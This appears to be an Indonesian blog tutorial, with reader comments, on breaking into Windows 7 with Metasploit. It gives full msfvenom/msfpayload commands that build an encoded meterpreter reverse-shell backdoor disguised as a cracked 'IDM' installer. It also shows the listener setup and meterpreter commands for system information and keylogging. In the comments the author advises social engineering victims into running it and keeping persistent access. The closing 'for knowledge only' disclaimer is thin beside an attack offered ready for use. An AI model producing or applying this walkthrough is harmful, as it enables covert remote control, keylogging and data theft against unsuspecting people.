Sting Category

 

Metasploit
Hai broo,
Kali ini saya akan memberikan tutorial tentang Cara Exploit Windows  7 dengan Metasploit di Kali Linux. bagi yang belum tau apa itu metasploit, kalian bisa cari sendiri di google :p
oke langsung saja broo
Pertama kita jalankan terlebih dahulu service postgresql dan metasploit
service postgresql start
service metasploit start
service metasploit start

Nah selanjutnya kita buat backdor dengan msfpayload
msfpayload windows/meterpreter/reverse_tcp LHOST=10.236.23.139 LPORT=4444 x > /root/Desktop/crack-IDM.exe
msfpayload windows/meterpreter/reverse_tcp LHOST=10.236.23.139 LPORT=4444 x > /root/Desktop/crack-IDM.exe

Keterangan :
LHOST = IP attacker, sesuaikan dengan IP anda
LPORT= Port Listener
/root/Desktop/= letak directori backdor yang di buat
crack-IDM.exe = nama Backdoor nya

Update!!
Karena pada versi Kali Linux yang terbaru dalam pembuatan backdoor sudah tidak lagi menggunakan msfpayload, dan di ganti dengan msfvenom jadi perintahnya sebagai berikut,
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 LHOST=10.236.23.139 LPORT=4444 -f exe > /root/Desktop/crack-IDM.exe
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 LHOST=10.236.23.139 LPORT=4444 -f exe > /root/Desktop/crack-IDM.exe

Kita juga dapat mebuat backdoor dengan format yang lainnya, kalian bisa lihat postingan saya tentang
Selanjutnya kita buka msfconsole, ketikkan di terminal
msfconsole  
Lalu ketikkan jenis exploit yang kita gunakan
use exploit/multi/handler 
use exploit/multi/handler

Lalu pilih payload yang digunakan
set payload windows/meterpreter/reverse_tcp
set payload windows/meterpreter/reverse_tcp

Tentukan LHOST (sesuaikan dengan ip anda harus sma saat pembuatan backdor)
set LHOST 10.236.23.139
set LHOST

Tentukan Port Listener
set LPORT 4444
set LPORT

Sekarang kita jalankan exploit,

exploit

Untuk mendapatkan akses ke sistem target, kita arus mengirimkan backdoor ke target dan target harus mengkesekusi backdoor tersebut

Meterpreter sessions 1 opened
Sesi Meterpreter 1 terbuka
Tanda bahwa target sudah mengeksekusi backdoor yang kita buat tadi, dan kita sudah berhasil memasuki sistem korban.
Dibawah ini contoh perintah meterpreter untuk melihat informasi sistem korban
sysinfo

Petintah meterpreter untuk keylogrecorder
run keylogrecorder

Dan masih banyak lagi perintah-perintah meterpreter yang dapat di jalankan.

Oke sampai disini dulu yang dapat saya bagikan kali ini tentang Exploit Windows  7 Dengan Metasploit di Kali Linux, Postingan ini dibuat hanya untuk pengetahuan semata, agar kita lebih hati-hati dalam menerima atau mendownload aplikasi atau file dari sumber yang tidak dikenal, segala penyalahgunaan dari tutorial ini bukan tanggung jawab saya. Terimakasih

Posting Komentar

  1. nah klo korban tidak mengeksekusi backdor gmna tuh gan? seharusnya walapun korban tidak megeksekusi kita bsa masuk k komputer korban,,nahh tuh bagaimana caranya :p

    BalasHapus
    Balasan
    1. Yaaa.. gimana caranya agan harus bisa buat target meng-install backdoor yang agan buat. Social engineering agan juga harus baik :>)

      Hapus
  2. bos kalau cara manggilnya gimana???misal sebelumnya si korban udah eksekusi tu backdor trus komputernya di restart / di matiin,,kalu sewaktu2 kita mw masuk lagi tanpa harus ngulang langkahnya dari awal bisa ngk bos????

    BalasHapus
    Balasan
    1. bisa banget mas :d dengan cara menanamkan backdoor permanent di komputer korban,
      bisa lihat artikel saya tentang Maintaining Acces dengan Persistence Metasploit

      Hapus
  3. mas, caranya ngirim pesannya gi mn?
    plissss..... mohon bantuannya :))

    BalasHapus
  4. gan kalo misal komputer target pakai koneksi internet yang sama dengan kita dan kita berhasil mendapatkan ip nya, terus kalo komputer target ganti lagi koneksi nya dan berbeda dengan koneksi kita maka ip nya mun akan berbeda , jadi gimana ? apa cara ini cuma bisa dipake buat yang satu koneksi ajaa ?

    BalasHapus

 
Top